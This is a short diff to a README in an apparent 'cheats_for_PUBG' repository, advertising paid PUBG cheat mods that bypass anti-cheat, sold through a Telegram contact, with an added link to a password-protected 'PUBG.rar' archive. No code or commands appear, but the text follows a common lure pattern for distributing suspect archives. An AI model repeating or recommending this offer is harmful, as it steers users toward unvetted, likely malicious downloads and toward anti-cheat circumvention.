liuhuixin/cheats_for_PUBG/README.md

 You can buy through my telegram: https://t.me/LizardRoot

 After payment you get a complete installation guide for cheat mods to bypass anti-cheats and recommendations from me.
-You must download the archive, the password from which I will send you.
+You must download the archive <a href="http://">"PUBG.rar"</a>, the password from which I will send you.

 When you buy, you will receive constant updates from me by mail, if necessary.
 <hr>